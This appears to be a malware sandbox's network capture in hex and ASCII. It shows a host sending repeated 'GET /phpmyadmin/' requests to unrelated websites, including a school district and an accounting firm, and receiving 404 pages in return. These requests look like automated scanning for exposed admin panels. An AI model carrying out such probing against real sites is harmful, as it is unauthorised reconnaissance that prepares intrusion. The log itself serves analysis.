2023-12-22 20:15:00 UTC	597	IN	HTTP/1.1 404 Not Found Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 X-Result-Reason: Not Redirected X-UrlRewriter-404: 404 Rewritten to DNN Tab : 404 Error Page(Tabid:37) : Reason Requested_404 X-UA-Compatible: IE=edge Set-Cookie: dnn_IsMobile=False; path=/; HttpOnly Set-Cookie: __RequestVerificationToken=UbKrbUwTpmRv_u671ztUJ4s7ZyntQM-nS0_diyZEuHxwc5zBXSQIBA2IlWDzBsr8dpcE0g2; path=/; HttpOnly X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Date: Fri, 22 Dec 2023 20:15:00 GMT Connection: close Content-Length: 33332
2023-12-22 20:15:00 UTC	15787	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 20 69 64 3d 22 48 65 61 64 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 2f 3e 0a 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 46 43 36 36 47 35 43 43 37 50 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 Data Ascii: <!DOCTYPE html><html lang="en-US"><head id="Head"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />... Google tag (gtag.js) --><script async src="https://www.googletagmanager.com/gtag/js?id=G-FC66G5CC7P"></script><script> w
2023-12-22 20:15:00 UTC	16384	IN	Data Raw: 6c 65 43 6f 6e 74 65 6e 74 20 4d 6f 64 32 73 78 63 61 70 70 43 22 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 27 73 63 2d 63 6f 6e 74 65 6e 74 2d 62 6c 6f 63 6b 27 20 20 64 61 74 61 2d 63 62 2d 69 6e 73 74 61 6e 63 65 3d 27 37 30 36 27 20 64 61 74 61 2d 63 62 2d 69 64 3d 27 37 30 36 27 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 6d 79 2d 36 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 73 6d 2d 36 20 63 6f 6c 2d 6c 67 2d 33 20 74 65 78 74 2d 63 65 6e 74 65 72 20 6d 62 2d 35 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 Data Ascii: leContent Mod2sxcappC"><div class='sc-content-block' data-cb-instance='706' data-cb-id='706'><div class="container my-6"> <div class="row"> <div class="col-sm-6 col-lg-3 text-center mb-5 d-flex flex-column align-items-center">
2023-12-22 20:15:00 UTC	1161	IN	Data Raw: 3f 63 64 76 3d 31 30 39 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 50 6f 72 74 61 6c 73 2f 5f 64 65 66 61 75 6c 74 2f 73 6b 69 6e 73 2f 63 61 6d 62 72 69 64 67 65 2d 61 64 65 6c 61 69 64 65 2f 6a 73 2f 6a 71 75 65 72 79 2e 73 6c 69 6d 6d 65 6e 75 2e 6a 73 3f 63 64 76 3d 31 30 39 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 50 6f 72 74 61 6c 73 2f 5f 64 65 66 61 75 6c 74 2f 73 6b 69 6e 73 2f 63 61 6d 62 72 69 64 67 65 2d 61 64 65 6c 61 69 64 65 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 6c 6c 69 70 73 69 73 2e 6d 69 6e 2e 6a 73 3f 63 64 76 3d 31 30 39 22 20 74 79 70 Data Ascii: ?cdv=109" type="text/javascript"></script><script src="/Portals/_default/skins/cambridge-adelaide/js/jquery.slimmenu.js?cdv=109" type="text/javascript"></script><script src="/Portals/_default/skins/cambridge-adelaide/js/jquery.ellipsis.min.js?cdv=109" typ

Session ID	Source IP	Source Port	Destination IP	Destination Port
157	192.168.2.4	62892	104.17.166.123	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:00 UTC	403	OUT	GET /phpmyadmin/ HTTP/1.1 Host: www.liberty25.org Accept: / Accept-Encoding: deflate, gzip Cookie: __cfruid=86e4b7d6ea29f95c56d290863f1c8e26dc3a8af6-1703276096; __cf_bm=uEwfLfFM0U2S_jMIcw4hEMEZwjd6P6W7VgrMYlzdcWA-1703276096-1-AayFdb5cfFZ2I1c/fqE/KXib6eMU2roQFgGGaVAZSXccxHdNNamEIjLLwbtF8SZWlzYnLsgTP4u91SsVZ9kMWE8= User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:00 UTC	1072	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:00 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close CF-Ray: 839b08ca9a25d9e9-MIA CF-Cache-Status: HIT Age: 6 Cache-Control: public, s-maxage=300, max-age=30, stale-if-error=21600, stale-while-revalidate=15 Strict-Transport-Security: max-age=31536000 Vary: Accept-Encoding Content-Security-Policy: Referrer-Policy: strict-origin-when-cross-origin X-Content-Type-Options: nosniff X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Request-Id: 46617c93-e31b-4477-b018-9c981ec1d827 X-Runtime: 0.559898 X-Xss-Protection: 1; mode=block Report-To: {"endpoints":[{"url":"https:\/\/csp-reporting.cloudflare.com\/cdn-cgi\/script_monitor\/report?m=UfQDWn.ajkXJ2fWo49bCRj81EYS4J2mrGWBCC4R9ZmE-1703276100-1-AQhpyr584vcNOkcN_4I4KuVOd7vZvMHPjmbP6-XyoS93S495ZItmavLvrt3PAFvdEb_x5jMmwYXZmfZXMeW8iKLhsr1jtW-1Jh-uLrg-tPQoyTX4Vu5isVNvPhJkWjy_UySVnrfDjKO0gqxRPqDdZhA2BlJ7x9csLAtI0HcycSQ_"}],"group":"cf-csp-endpoint","max_age":86400}
2023-12-22 20:15:00 UTC	446	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 2d 52 65 70 6f 72 74 2d 4f 6e 6c 79 3a 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 72 65 70 6f 72 74 2d 75 72 69 20 68 74 74 70 73 3a 2f 2f 63 73 70 2d 72 65 70 6f 72 74 69 6e 67 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 5f 6d 6f 6e 69 74 6f 72 2f 72 65 70 6f 72 74 3f 6d 3d 55 66 51 44 57 6e 2e 61 6a 6b 58 4a 32 66 57 6f 34 39 62 43 52 6a 38 31 45 59 53 34 4a 32 6d 72 47 57 42 43 43 34 52 39 5a 6d 45 2d 31 37 30 33 32 37 36 31 30 30 2d 31 2d 41 51 68 70 79 72 35 38 34 76 63 4e 4f 6b 63 4e 5f 34 49 34 4b 75 56 4f 64 37 76 5a 76 4d 48 50 6a 6d 62 50 36 2d 58 79 6f 53 39 33 53 34 39 35 5a 49 74 6d 61 76 4c 76 72 74 33 50 41 46 Data Ascii: Content-Security-Policy-Report-Only: script-src 'none'; report-uri https://csp-reporting.cloudflare.com/cdn-cgi/script_monitor/report?m=UfQDWn.ajkXJ2fWo49bCRj81EYS4J2mrGWBCC4R9ZmE-1703276100-1-AQhpyr584vcNOkcN_4I4KuVOd7vZvMHPjmbP6-XyoS93S495ZItmavLvrt3PAF
2023-12-22 20:15:00 UTC	1369	IN	Data Raw: 37 66 66 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 38 5d 3e 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6c 74 2d 69 65 39 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 4c 69 62 65 72 74 79 20 45 6c 65 6d 65 6e 74 61 72 79 20 53 63 68 6f 6f 6c 20 44 69 73 74 72 69 63 74 Data Ascii: 7ff2<!DOCTYPE html>...[if lte IE 8]> <html lang="en-US" class="lt-ie9"> <![endif]-->...[if gt IE 8]>...> <html lang="en-US"> ...<![endif]--><head><meta charset="utf-8"><title>404 - Page Not Found - Liberty Elementary School District
2023-12-22 20:15:00 UTC	1369	IN	Data Raw: 68 6f 6f 6c 20 44 69 73 74 72 69 63 74 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2c 20 4c 69 62 65 72 74 79 20 45 6c 65 6d 65 6e 74 61 72 79 20 53 63 68 6f 6f 6c 20 44 69 73 74 72 69 63 74 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 0a 09 09 Data Ascii: hool District"><meta name="keywords" content="404 - Page Not Found, Liberty Elementary School District"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta http-equiv="X-UA-Compatible" content="IE=edge">
2023-12-22 20:15:00 UTC	1369	IN	Data Raw: 6e 2e 70 75 73 68 3d 6e 3b 6e 2e 6c 6f 61 64 65 64 3d 21 30 3b 6e 2e 76 65 72 73 69 6f 6e 3d 27 32 2e 30 27 3b 0a 6e 2e 71 75 65 75 65 3d 5b 5d 3b 74 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 65 29 3b 74 2e 61 73 79 6e 63 3d 21 30 3b 0a 74 2e 73 72 63 3d 76 3b 73 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 5b 30 5d 3b 0a 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 74 2c 73 29 7d 28 77 69 6e 64 6f 77 2c 20 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 0a 27 68 74 74 70 73 3a 2f 2f 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 2f 65 6e 5f 55 53 2f 66 62 65 76 65 6e 74 73 2e 6a 73 27 29 3b 0a 66 62 71 28 27 69 6e 69 74 27 2c 20 27 32 37 30 34 32 36 35 34 38 33 Data Ascii: n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window, document,'script','https://connect.facebook.net/en_US/fbevents.js');fbq('init', '2704265483
2023-12-22 20:15:00 UTC	1369	IN	Data Raw: 20 64 61 74 61 2d 73 65 74 74 69 6e 67 73 2d 69 64 3d 22 32 30 31 33 22 20 64 61 74 61 2d 75 73 65 2d 6e 65 77 3d 22 74 72 75 65 22 3e 0a 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 45 6c 65 6d 65 6e 74 20 66 73 43 6f 6e 74 61 69 6e 65 72 20 6d 65 6e 75 2d 74 72 69 67 67 65 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 69 64 3d 22 66 73 45 6c 5f 32 30 30 38 22 20 64 61 74 61 2d 75 73 65 2d 6e 65 77 3d 22 74 72 75 65 22 20 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 45 6c 65 6d 65 6e 74 43 6f 6e 74 65 6e 74 22 20 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 45 6c 65 6d 65 6e 74 20 66 73 45 6d 62 65 64 20 6d 65 6e 75 2d 74 72 69 67 67 65 72 22 20 69 64 3d 22 66 73 45 6c 5f 32 30 30 39 22 20 64 61 74 61 2d 75 73 65 2d 6e 65 Data Ascii: data-settings-id="2013" data-use-new="true"><div class="fsElement fsContainer menu-trigger-container" id="fsEl_2008" data-use-new="true" ><div class="fsElementContent" ><div class="fsElement fsEmbed menu-trigger" id="fsEl_2009" data-use-ne
2023-12-22 20:15:00 UTC	1369	IN	Data Raw: 6c 65 61 72 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 66 73 53 65 61 72 63 68 45 6c 65 6d 65 6e 74 53 65 61 72 63 68 42 75 74 74 6f 6e 20 66 73 53 74 79 6c 65 55 70 64 61 74 65 42 75 74 74 6f 6e 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 53 65 61 72 63 68 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 66 6f 72 6d 3e 0a 09 3c 2f 64 69 76 3e 0a 09 3c 66 6f 6f 74 65 72 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 45 6c 65 6d 65 6e 74 46 6f 6f 74 65 72 43 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 3c 64 69 76 3e 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 63 6c 6f 73 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 65 74 65 78 74 22 3e 43 6c 6f 73 65 20 53 65 61 72 63 Data Ascii: lear</span></button></div><button class="fsSearchElementSearchButton fsStyleUpdateButton" type="submit">Search</button></form></div><footer><div class="fsElementFooterContent"><div><button class="search-close"><span class="hidetext">Close Searc
2023-12-22 20:15:00 UTC	1369	IN	Data Raw: 69 62 65 72 74 79 2f 6c 69 62 65 72 74 79 2d 61 74 2d 61 2d 67 6c 61 6e 63 65 22 3e 4c 69 62 65 72 74 79 20 61 74 20 61 20 47 6c 61 6e 63 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 65 6c 65 63 74 69 6f 6e 2d 69 6e 66 6f 72 6d 61 74 69 6f 6e 22 3e 45 6c 65 63 74 69 6f 6e 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 72 65 6e 74 50 61 67 65 22 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 62 75 64 67 65 74 22 3e 42 75 64 67 65 74 3c 2f 61 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 67 65 49 6e 66 6f 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 4c 65 76 65 6c 33 22 Data Ascii: iberty/liberty-at-a-glance">Liberty at a Glance</a></li><li><a href="/about-liberty/election-information">Election Information</a></li><li class="fsNavParentPage"><a href="/about-liberty/budget">Budget</a><div class="fsNavPageInfo"><ul class="fsNavLevel3"
2023-12-22 20:15:00 UTC	1369	IN	Data Raw: 2d 73 65 72 76 69 63 65 73 22 3e 46 6f 6f 64 20 53 65 72 76 69 63 65 73 3c 2f 61 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 50 61 67 65 49 6e 66 6f 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 66 73 4e 61 76 4c 65 76 65 6c 34 22 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 66 6f 6f 64 2d 73 65 72 76 69 63 65 73 2f 66 72 65 65 2d 72 65 64 75 63 65 64 2d 61 70 70 6c 69 63 61 74 69 6f 6e 22 3e 46 72 65 65 20 26 61 6d 70 3b 20 52 65 64 75 63 65 64 20 41 70 70 6c 69 63 61 74 69 6f 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 69 62 65 72 74 79 6b 31 32 2e 6e 75 74 72 69 73 6c 69 63 65 2e 63 6f 6d 2f 6d 65 6e 75 Data Ascii: -services">Food Services</a><div class="fsNavPageInfo"><ul class="fsNavLevel4"><li><a href="/about-liberty/district-services/food-services/free-reduced-application">Free & Reduced Application</a></li><li><a href="https://libertyk12.nutrislice.com/menu
2023-12-22 20:15:00 UTC	1369	IN	Data Raw: 4e 61 76 4c 65 76 65 6c 34 22 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 73 70 65 63 69 61 6c 2d 73 65 72 76 69 63 65 73 2f 63 6f 75 6e 73 65 6c 69 6e 67 2d 73 65 72 76 69 63 65 73 22 3e 43 6f 75 6e 73 65 6c 69 6e 67 20 53 65 72 76 69 63 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 64 69 73 74 72 69 63 74 2d 73 65 72 76 69 63 65 73 2f 73 70 65 63 69 61 6c 2d 73 65 72 76 69 63 65 73 2f 65 6e 67 6c 69 73 68 2d 6c 61 6e 67 75 61 67 65 2d 6c 65 61 72 6e 65 72 73 22 3e 45 6e 67 6c 69 73 68 20 4c 61 6e 67 75 61 67 65 20 4c 65 61 72 6e 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 Data Ascii: NavLevel4"><li><a href="/about-liberty/district-services/special-services/counseling-services">Counseling Services</a></li><li><a href="/about-liberty/district-services/special-services/english-language-learners">English Language Learners</a></li><li><a h
2023-12-22 20:15:00 UTC	1369	IN	Data Raw: 6e 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 72 74 61 6c 2e 73 63 68 6f 6f 6c 73 69 74 65 6c 6f 63 61 74 6f 72 2e 63 6f 6d 2f 61 70 70 73 2f 73 73 6c 2f 3f 64 69 73 74 72 69 63 74 63 6f 64 65 3d 30 30 39 39 30 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 53 63 68 6f 6f 6c 20 42 6f 75 6e 64 61 72 69 65 73 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 73 53 74 79 6c 65 53 52 4f 6e 6c 79 22 3e 28 6f 70 65 6e 73 20 69 6e 20 6e 65 77 20 77 69 6e 64 6f 77 2f 74 61 62 29 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2d 6c 69 62 65 72 74 79 2f 67 75 Data Ascii: ns</a></li><li><a href="https://portal.schoolsitelocator.com/apps/ssl/?districtcode=00990" target="_blank">School Boundaries<span class="fsStyleSROnly">(opens in new window/tab)</span></a></li></ul></div></li></ul></div></li><li><a href="/about-liberty/gu

Session ID	Source IP	Source Port	Destination IP	Destination Port
158	192.168.2.4	62637	35.197.165.27	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:00 UTC	190	OUT	GET /phpmyadmin/ HTTP/1.1 Host: www.conquestaccounting.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:00 UTC	560	IN	HTTP/1.1 404 Not Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT content-type: text/html; charset=UTF-8 link: <https://www.conquestaccounting.com.au/wp-json/>; rel="https://api.w.org/" cache-control: no-cache, must-revalidate, max-age=0 x-cacheable: yes x-litespeed-cache: hit content-length: 105931 date: Fri, 22 Dec 2023 20:15:00 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:15:00 UTC	808	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6f 6e 71 75 65 73 74 61 63 63 6f 75 6e 74 69 6e 67 2e 63 6f 6d 2e 61 75 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 Data Ascii: <!DOCTYPE html><html lang="en-US" class="no-js "><head><meta charset="UTF-8" /><link rel="alternate" hreflang="en-US" href="https://www.conquestaccounting.com.au/phpmyadmin/"/><meta name='robots' content='noindex, follow' /><script type="text/java
2023-12-22 20:15:01 UTC	14994	IN	Data Raw: 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 43 6f 6e 71 75 65 73 74 20 41 63 63 6f 75 6e 74 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 Data Ascii: This site is optimized with the Yoast SEO plugin v21.4 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - Conquest Accounting</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -
2023-12-22 20:15:01 UTC	16384	IN	Data Raw: 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 3f 76 65 72 3d 35 2e 38 2e 32 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6d 66 6e 2d 62 65 2d 63 73 73 27 20 68 72 65 66 3d 27 2f 2f 63 64 6e 2d 36 34 31 62 61 35 38 31 63 31 61 63 31 61 33 35 36 38 62 36 33 33 38 38 2e 63 6c 6f 73 74 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 63 6f 6e 71 75 65 73 74 61 63 63 2f 63 73 73 2f 62 65 2e 63 73 73 3f 76 65 72 3d 32 37 2e 32 2e 39 2e 32 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 Data Ascii: content/plugins/contact-form-7/includes/css/styles.css?ver=5.8.2' type='text/css' media='all' /><link rel='stylesheet' id='mfn-be-css' href='//cdn-641ba581c1ac1a3568b63388.closte.com/wp-content/themes/conquestacc/css/be.css?ver=27.2.9.2' type='text/css'
2023-12-22 20:15:01 UTC	16384	IN	Data Raw: 65 64 5d 3a 68 6f 76 65 72 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 2e 61 6c 74 2e 64 69 73 61 62 6c 65 64 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 2e 61 6c 74 2e 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 2e 61 6c 74 3a 64 69 73 61 62 6c 65 64 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 2e 61 6c 74 3a 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 2e 61 6c 74 3a 64 69 73 61 62 6c 65 64 5b 64 69 73 61 62 6c 65 64 5d 2c 2e 62 75 74 74 6f 6e 2d 72 6f 75 6e 64 20 62 75 74 74 Data Ascii: ed]:hover,.button-round button.button.alt.disabled,.button-round button.button.alt.disabled:hover,.button-round button.button.alt:disabled,.button-round button.button.alt:disabled:hover,.button-round button.button.alt:disabled[disabled],.button-round butt
